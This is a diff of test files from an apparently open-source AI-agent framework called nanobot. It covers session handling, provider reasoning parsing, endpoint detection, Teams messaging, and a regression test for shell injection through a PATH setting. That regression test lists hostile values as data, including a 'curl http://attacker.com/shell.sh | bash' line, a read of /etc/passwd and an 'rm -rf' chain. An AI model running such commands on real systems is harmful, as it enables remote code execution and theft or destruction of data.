monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object())
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.build_agent_runtime",
|
||||
lambda _config: _test_agent_runtime(object(), _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.agent.runtime.load_agent_runtime",
|
||||
lambda _config_path=None: _test_agent_runtime(object(), config),
|
||||
)
|
||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
||||
|
||||
|
||||
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
@ -0,0 +1,120 @@
|
||||
"""Tests for heartbeat context bridge — injecting delivered messages into channel session."""
|
||||
|
||||
from nanobot.session.manager import SessionManager
|
||||
|
||||
|
||||
class TestHeartbeatContextBridge:
|
||||
"""Verify that on_heartbeat_notify injects the assistant message into the
|
||||
channel session so user replies have conversational context."""
|
||||
|
||||
def test_notify_injects_into_channel_session(self, tmp_path):
|
||||
"""After notify, the target channel session should contain the
|
||||
heartbeat response as an assistant turn."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Simulate: session exists with one user message
|
||||
target_session = session_mgr.get_or_create(target_key)
|
||||
target_session.add_message("user", "hello earlier")
|
||||
session_mgr.save(target_session)
|
||||
|
||||
# Simulate what on_heartbeat_notify does
|
||||
target_session = session_mgr.get_or_create(target_key)
|
||||
target_session.add_message(
|
||||
"assistant",
|
||||
"3 new emails — invoice, meeting, proposal.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(target_session)
|
||||
|
||||
# Reload and verify
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
messages = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in messages]
|
||||
assert roles == ["user", "assistant"]
|
||||
assert "3 new emails" in messages[-1]["content"]
|
||||
|
||||
def test_reply_after_injection_has_context(self, tmp_path):
|
||||
"""Simulates the full flow: prior conversation exists, heartbeat
|
||||
injects, then user replies. The session should have the heartbeat
|
||||
message visible in get_history so the model sees the context."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Pre-existing conversation (user has chatted before)
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "Hey")
|
||||
session.add_message("assistant", "Hi there!")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Step 1: heartbeat injects assistant message
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"If you want, I can mark that email as read.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(session)
|
||||
|
||||
# Step 2: user replies "Sure"
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "Sure")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Verify: get_history includes the heartbeat injection
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in history]
|
||||
assert roles == ["user", "assistant", "assistant", "user"]
|
||||
assert "mark that email" in history[2]["content"]
|
||||
assert history[3]["content"] == "Sure"
|
||||
|
||||
def test_injection_does_not_duplicate_on_existing_history(self, tmp_path):
|
||||
"""If the channel session already has messages, the injection
|
||||
appends cleanly without corruption."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Pre-existing conversation
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "What time is it?")
|
||||
session.add_message("assistant", "It's 2pm.")
|
||||
session.add_message("user", "Thanks")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Heartbeat injects
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"You have a meeting in 30 minutes.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(session)
|
||||
|
||||
# Verify
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in history]
|
||||
assert roles == ["user", "assistant", "user", "assistant"]
|
||||
assert "meeting in 30 minutes" in history[-1]["content"]
|
||||
|
||||
def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path):
|
||||
"""A user replying to the first delivered message still sees that context."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:99999"
|
||||
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"Weather alert: sandstorm expected at 4pm.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session.add_message("user", "Sure")
|
||||
session_mgr.save(session)
|
||||
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
assert len(history) == 2
|
||||
assert history[0]["role"] == "assistant"
|
||||
assert "sandstorm" in history[0]["content"]
|
||||
assert history[1] == {"role": "user", "content": "Sure"}
|
||||
@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None:
|
||||
assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
|
||||
|
||||
|
||||
def _deepseek_kwargs(messages: list[dict]) -> dict:
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="sk-test",
|
||||
default_model="deepseek-v4-flash",
|
||||
spec=find_by_name("deepseek"),
|
||||
)
|
||||
|
||||
return provider._build_kwargs(
|
||||
messages=messages,
|
||||
tools=None,
|
||||
model="deepseek-v4-flash",
|
||||
max_tokens=1024,
|
||||
temperature=0.7,
|
||||
reasoning_effort="high",
|
||||
tool_choice=None,
|
||||
)
|
||||
|
||||
|
||||
def _tool_call(call_id: str) -> dict:
|
||||
return {
|
||||
"id": call_id,
|
||||
"type": "function",
|
||||
"function": {"name": "my", "arguments": "{}"},
|
||||
}
|
||||
|
||||
|
||||
def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||
{"role": "user", "content": "continue"},
|
||||
])
|
||||
|
||||
assert kwargs["messages"] == [
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "continue"},
|
||||
]
|
||||
|
||||
|
||||
def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "",
|
||||
"reasoning_content": "I should inspect supported channels.",
|
||||
"tool_calls": [_tool_call("call_good")],
|
||||
},
|
||||
{"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"},
|
||||
{"role": "user", "content": "continue"},
|
||||
])
|
||||
|
||||
assistant = kwargs["messages"][1]
|
||||
assert assistant["role"] == "assistant"
|
||||
assert assistant["reasoning_content"] == "I should inspect supported channels."
|
||||
assert kwargs["messages"][2]["role"] == "tool"
|
||||
|
||||
|
||||
def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None:
|
||||
kwargs = _deepseek_kwargs([
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||
])
|
||||
|
||||
assert kwargs["messages"] == [
|
||||
{"role": "system", "content": "system"},
|
||||
{"role": "user", "content": "can we use wechat?"},
|
||||
]
|
||||
|
||||
|
||||
def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
118
tests/providers/test_local_endpoint_detection.py
Normal file
118
tests/providers/test_local_endpoint_detection.py
Normal file
@ -0,0 +1,118 @@
|
||||
"""Tests for _is_local_endpoint detection and keepalive configuration."""
|
||||
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
from nanobot.providers.openai_compat_provider import (
|
||||
OpenAICompatProvider,
|
||||
_is_local_endpoint,
|
||||
)
|
||||
|
||||
|
||||
def _make_spec(is_local: bool = False) -> MagicMock:
|
||||
spec = MagicMock()
|
||||
spec.is_local = is_local
|
||||
return spec
|
||||
|
||||
|
||||
class TestIsLocalEndpoint:
|
||||
"""Test the _is_local_endpoint helper."""
|
||||
|
||||
def test_spec_is_local_true(self):
|
||||
assert _is_local_endpoint(_make_spec(is_local=True), None) is True
|
||||
|
||||
def test_spec_is_local_false_no_base(self):
|
||||
assert _is_local_endpoint(_make_spec(is_local=False), None) is False
|
||||
|
||||
def test_no_spec_no_base(self):
|
||||
assert _is_local_endpoint(None, None) is False
|
||||
|
||||
def test_localhost(self):
|
||||
assert _is_local_endpoint(None, "http://localhost:1234/v1") is True
|
||||
|
||||
def test_localhost_https(self):
|
||||
assert _is_local_endpoint(None, "https://localhost:8080/v1") is True
|
||||
|
||||
def test_loopback_127(self):
|
||||
assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True
|
||||
|
||||
def test_private_192_168(self):
|
||||
assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True
|
||||
|
||||
def test_private_10(self):
|
||||
assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True
|
||||
|
||||
def test_private_172_16(self):
|
||||
assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True
|
||||
|
||||
def test_private_172_31(self):
|
||||
assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True
|
||||
|
||||
def test_not_private_172_32(self):
|
||||
assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False
|
||||
|
||||
def test_docker_internal(self):
|
||||
assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True
|
||||
|
||||
def test_ipv6_loopback(self):
|
||||
assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True
|
||||
|
||||
def test_public_api(self):
|
||||
assert _is_local_endpoint(None, "https://api.openai.com/v1") is False
|
||||
|
||||
def test_openrouter(self):
|
||||
assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False
|
||||
|
||||
def test_spec_overrides_public_url(self):
|
||||
"""spec.is_local=True takes precedence even with a public-looking URL."""
|
||||
assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True
|
||||
|
||||
def test_case_insensitive(self):
|
||||
assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True
|
||||
|
||||
def test_trailing_slash(self):
|
||||
assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True
|
||||
|
||||
def test_public_hostname_containing_localhost_is_not_local(self):
|
||||
assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False
|
||||
|
||||
def test_public_hostname_containing_private_ip_prefix_is_not_local(self):
|
||||
assert _is_local_endpoint(None, "https://api10.example.com/v1") is False
|
||||
|
||||
def test_url_without_scheme(self):
|
||||
assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True
|
||||
|
||||
|
||||
class TestLocalKeepaliveConfig:
|
||||
"""Verify that local endpoints get keepalive_expiry=0."""
|
||||
|
||||
def test_local_spec_disables_keepalive(self):
|
||||
spec = _make_spec(is_local=True)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = "http://localhost:11434/v1"
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base="http://localhost:11434/v1", spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
assert pool._keepalive_expiry == 0
|
||||
|
||||
def test_lan_ip_disables_keepalive(self):
|
||||
"""A generic 'openai' spec with a LAN IP should still disable keepalive."""
|
||||
spec = _make_spec(is_local=False)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = None
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
assert pool._keepalive_expiry == 0
|
||||
|
||||
def test_cloud_keeps_default_keepalive(self):
|
||||
spec = _make_spec(is_local=False)
|
||||
spec.env_key = ""
|
||||
spec.default_api_base = "https://api.openai.com/v1"
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="test", api_base=None, spec=spec,
|
||||
)
|
||||
pool = provider._client._client._transport._pool
|
||||
# Default httpx keepalive is 5.0s
|
||||
assert pool._keepalive_expiry == 5.0
|
||||
@ -9,6 +9,17 @@ from types import SimpleNamespace
|
||||
from unittest.mock import patch
|
||||
|
||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
from nanobot.providers.registry import ProviderSpec
|
||||
|
||||
_STEPFUN_SPEC = ProviderSpec(
|
||||
name="stepfun",
|
||||
keywords=("stepfun", "step"),
|
||||
env_key="STEPFUN_API_KEY",
|
||||
display_name="Step Fun",
|
||||
backend="openai_compat",
|
||||
default_api_base="https://api.stepfun.com/v1",
|
||||
reasoning_as_content=True,
|
||||
)
|
||||
|
||||
|
||||
# ── _parse: dict branch ─────────────────────────────────────────────────────
|
||||
@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
||||
"""When content is None and reasoning exists, content falls back to reasoning."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
||||
def test_parse_dict_stepfun_reasoning_priority() -> None:
|
||||
"""reasoning_content field takes priority over reasoning when both present."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None):
|
||||
def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
||||
"""SDK branch: content falls back to msg.reasoning when content is None."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.")
|
||||
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||
@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
||||
def test_parse_sdk_stepfun_reasoning_priority() -> None:
|
||||
"""reasoning_content field takes priority over reasoning in SDK branch."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||
|
||||
msg = _make_sdk_message(
|
||||
content=None,
|
||||
@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None:
|
||||
result = OpenAICompatProvider._parse_chunks(chunks)
|
||||
|
||||
assert result.reasoning_content == "formal: "
|
||||
|
||||
|
||||
# ── Regression: non-StepFun providers must NOT promote reasoning to content ─
|
||||
|
||||
|
||||
def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None:
|
||||
"""Providers without reasoning_as_content flag must not treat reasoning as content."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
response = {
|
||||
"choices": [{
|
||||
"message": {
|
||||
"content": None,
|
||||
"reasoning": "internal thought process that should NOT be shown to user",
|
||||
},
|
||||
"finish_reason": "stop",
|
||||
}],
|
||||
}
|
||||
|
||||
result = provider._parse(response)
|
||||
|
||||
# content stays None — reasoning is NOT promoted
|
||||
assert result.content is None
|
||||
# reasoning still goes to reasoning_content for display as thinking
|
||||
assert result.reasoning_content == "internal thought process that should NOT be shown to user"
|
||||
|
||||
|
||||
def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None:
|
||||
"""SDK branch: providers without flag must not treat reasoning as content."""
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider()
|
||||
|
||||
msg = _make_sdk_message(content=None, reasoning="internal monologue")
|
||||
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||
response = SimpleNamespace(choices=[choice], usage=None)
|
||||
|
||||
result = provider._parse(response)
|
||||
|
||||
assert result.content is None
|
||||
assert result.reasoning_content == "internal monologue"
|
||||
|
||||
@ -1,4 +1,5 @@
|
||||
import json
|
||||
import time
|
||||
|
||||
import pytest
|
||||
|
||||
@ -260,6 +261,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel):
|
||||
assert ch._sanitize_inbound_text(activity) == "normal inline message"
|
||||
|
||||
|
||||
def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel):
|
||||
ch = make_channel()
|
||||
|
||||
activity = {
|
||||
"text": "Hello from Teams",
|
||||
"channelData": {},
|
||||
}
|
||||
|
||||
assert ch._sanitize_inbound_text(activity) == "Hello from Teams"
|
||||
|
||||
|
||||
def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
|
||||
ch = make_channel()
|
||||
|
||||
@ -371,7 +383,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel):
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel):
|
||||
async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel):
|
||||
ch = make_channel(replyInThread=True)
|
||||
fake_http = FakeHttpClient()
|
||||
ch._http = fake_http
|
||||
@ -387,7 +399,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe
|
||||
|
||||
assert len(fake_http.calls) == 1
|
||||
url, kwargs = fake_http.calls[0]
|
||||
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1"
|
||||
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities"
|
||||
assert kwargs["headers"]["Authorization"] == "Bearer tok"
|
||||
assert kwargs["json"]["text"] == "Reply text"
|
||||
assert kwargs["json"]["replyToId"] == "activity-1"
|
||||
@ -551,6 +563,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa
|
||||
assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
|
||||
|
||||
|
||||
def test_save_refs_prunes_webchat_and_stale_refs(make_channel):
|
||||
ch = make_channel()
|
||||
now = time.time()
|
||||
ch._conversation_refs = {
|
||||
"teams-good": ConversationRef(
|
||||
service_url="https://smba.trafficmanager.net/amer/",
|
||||
conversation_id="teams-good",
|
||||
conversation_type="personal",
|
||||
updated_at=now,
|
||||
),
|
||||
"webchat-bad": ConversationRef(
|
||||
service_url="https://webchat.botframework.com/",
|
||||
conversation_id="webchat-bad",
|
||||
conversation_type=None,
|
||||
updated_at=now,
|
||||
),
|
||||
"teams-stale": ConversationRef(
|
||||
service_url="https://smba.trafficmanager.net/amer/",
|
||||
conversation_id="teams-stale",
|
||||
conversation_type="personal",
|
||||
updated_at=now - (31 * 24 * 60 * 60),
|
||||
),
|
||||
}
|
||||
|
||||
ch._save_refs()
|
||||
|
||||
assert set(ch._conversation_refs) == {"teams-good"}
|
||||
saved = json.loads(ch._refs_path.read_text(encoding="utf-8"))
|
||||
assert set(saved) == {"teams-good"}
|
||||
assert saved["teams-good"]["updated_at"] == pytest.approx(now)
|
||||
|
||||
|
||||
def test_msteams_default_config_includes_restart_notify_fields():
|
||||
cfg = MSTeamsChannel.default_config()
|
||||
|
||||
|
||||
@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch):
|
||||
tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
|
||||
result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
|
||||
assert "Exit code: 1" in result
|
||||
|
||||
|
||||
# --- path_append injection prevention ------------------------------------
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize(
|
||||
"malicious_path",
|
||||
[
|
||||
# semicolon — classic command separator
|
||||
'/tmp/bin; echo INJECTED',
|
||||
# command substitution via $()
|
||||
'/tmp/bin; echo $(whoami)',
|
||||
# backtick command substitution
|
||||
"/tmp/bin; echo `id`",
|
||||
# pipe to another command
|
||||
'/tmp/bin; cat /etc/passwd',
|
||||
# chained with &&
|
||||
'/tmp/bin && curl http://attacker.com/shell.sh | bash',
|
||||
# newline injection
|
||||
'/tmp/bin\necho INJECTED',
|
||||
# mixed shell metacharacters
|
||||
'/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED',
|
||||
],
|
||||
)
|
||||
async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path):
|
||||
"""Shell metacharacters in path_append must NOT be interpreted as commands.
|
||||
|
||||
Regression test for: path_append was previously concatenated into a shell
|
||||
command string via f'export PATH="$PATH:{path_append}"; {command}', which
|
||||
allowed shell injection. After the fix, path_append is passed through the
|
||||
env dict so metacharacters are treated as literal path characters.
|
||||
"""
|
||||
tool = ExecTool(path_append=malicious_path)
|
||||
result = await tool.execute(command="echo SAFE_OUTPUT")
|
||||
|
||||
# The original command should succeed
|
||||
assert "SAFE_OUTPUT" in result
|
||||
|
||||
# None of the injected payloads should have produced side-effects
|
||||
assert "INJECTED" not in result
|
||||
assert "root:" not in result # /etc/passwd content
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
async def test_exec_path_append_command_substitution_does_not_execute(tmp_path):
|
||||
"""$() in path_append must not trigger command substitution.
|
||||
|
||||
We create a marker file and try to read it via $(cat ...). If command
|
||||
substitution works, the marker content appears in output.
|
||||
"""
|
||||
marker = tmp_path / "secret_marker.txt"
|
||||
marker.write_text("SHOULD_NOT_APPEAR")
|
||||
|
||||
tool = ExecTool(
|
||||
path_append=f'/tmp/bin; echo $(cat {marker})',
|
||||
)
|
||||
result = await tool.execute(command="echo OK")
|
||||
|
||||
assert "OK" in result
|
||||
assert "SHOULD_NOT_APPEAR" not in result
|
||||
|
||||
|
||||
@_UNIX_ONLY
|
||||
@pytest.mark.asyncio
|
||||
async def test_exec_path_append_legitimate_path_still_works():
|
||||
"""A normal, safe path_append value must still be appended to PATH."""
|
||||
tool = ExecTool(path_append="/opt/custom/bin")
|
||||
result = await tool.execute(command="echo $PATH")
|
||||
assert "/opt/custom/bin" in result
|
||||
|
||||
@ -148,23 +148,33 @@ class TestSpawnWindows:
|
||||
class TestPathAppendPlatform:
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unix_injects_export(self):
|
||||
"""On Unix, path_append is an export statement prepended to command."""
|
||||
async def test_unix_uses_env_var_in_fixed_export(self):
|
||||
"""On Unix, path_append must not be interpolated into shell source."""
|
||||
mock_proc = AsyncMock()
|
||||
mock_proc.communicate.return_value = (b"ok", b"")
|
||||
mock_proc.returncode = 0
|
||||
|
||||
captured_cmd = None
|
||||
captured_env = {}
|
||||
|
||||
async def capture_spawn(cmd, cwd, env):
|
||||
nonlocal captured_cmd
|
||||
captured_cmd = cmd
|
||||
captured_env.update(env)
|
||||
return mock_proc
|
||||
|
||||
with (
|
||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
|
||||
patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
|
||||
patch("nanobot.agent.tools.shell.os.pathsep", ":"),
|
||||
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||
):
|
||||
tool = ExecTool(path_append="/opt/bin")
|
||||
tool = ExecTool(path_append="/opt/bin; echo INJECTED")
|
||||
await tool.execute(command="ls")
|
||||
|
||||
spawned_cmd = mock_spawn.call_args[0][0]
|
||||
assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
|
||||
assert spawned_cmd.endswith("ls")
|
||||
assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
|
||||
assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
|
||||
assert "INJECTED" not in captured_cmd
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_windows_modifies_env(self):
|
||||
@ -181,6 +191,7 @@ class TestPathAppendPlatform:
|
||||
|
||||
with (
|
||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
|
||||
patch("nanobot.agent.tools.shell.os.pathsep", ";"),
|
||||
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||
):
|
||||
|
||||
@ -1,6 +1,7 @@
|
||||
import pytest
|
||||
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@ -29,3 +30,23 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None:
|
||||
content="hi", channel="telegram", chat_id="1", buttons=bad,
|
||||
)
|
||||
assert result == "Error: buttons must be a list of list of strings"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None:
|
||||
sent: list[OutboundMessage] = []
|
||||
|
||||
async def _send(msg: OutboundMessage) -> None:
|
||||
sent.append(msg)
|
||||
|
||||
tool = MessageTool(send_callback=_send)
|
||||
|
||||
await tool.execute(content="normal", channel="telegram", chat_id="1")
|
||||
token = tool.set_record_channel_delivery(True)
|
||||
try:
|
||||
await tool.execute(content="cron", channel="telegram", chat_id="1")
|
||||
finally:
|
||||
tool.reset_record_channel_delivery(token)
|
||||
|
||||
assert sent[0].metadata == {}
|
||||
assert sent[1].metadata == {"_record_channel_delivery": True}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user